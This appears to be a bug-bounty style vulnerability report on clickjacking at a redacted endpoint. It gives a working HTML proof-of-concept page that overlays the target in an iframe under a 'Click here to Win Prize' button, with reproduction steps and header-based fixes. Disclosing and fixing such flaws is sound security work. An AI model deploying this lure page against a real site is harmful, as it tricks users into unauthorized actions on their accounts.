- Endpoint: REDACTED
- Date: 18 September 2024
- Type: ClickJacking
- Severity: Medium
- Impact: Attackers can create an invisible iframe overlay of the affected page, tricking users into clicking buttons or links that perform actions on their behalf. This could result in unauthorized actions, data exposure, or account compromises.
The webpage at REDACTED is vulnerable to a ClickJacking attack. ClickJacking is a technique that tricks users into clicking something different from what they perceive, potentially leading to unintended actions such as account hijacking or the execution of malicious tasks.
- The page does not have an appropriate HTTP security header to prevent ClickJacking, such as the
X-Frame-OptionsorContent-Security-Policyheaders that would block it from being embedded in iframes.
-
Create an HTML page that embeds REDACTED using an
<iframe>tag:<!DOCTYPE html> <html> <head> <title>Clickjacking PoC</title> <style> iframe { opacity: 0.9; position: absolute; top: 50px; left: 50px; width: 60%; height: 100%; z-index: 99; } input[type="button"] { position: absolute; top: 233px; /* Adjust to place on top of the iframe */ left: 180px; /* Adjust to place on top of the iframe */ z-index: 100; /* This will keep the button above the iframe */ font-size: 20px; padding: 10px 200px; } </style> </head> <body> <input type=button value="Click here to Win Prize"> <iframe src="REDACTED"></iframe> </body> </html>
-
Host the HTML page on a separate domain.
-
Open the hosted HTML file and observe how the victim page is embedded.
-
Click the button, and the click event will be transferred to the underlying iframe, causing an unintended action on the victim's site.
- Implement the
X-Frame-Optionsheader with the valueDENYorSAMEORIGINto prevent the page from being embedded in iframes. - Alternatively, implement a
Content-Security-Policyheader with theframe-ancestorsdirective set to'self'to restrict which domains can embed the page.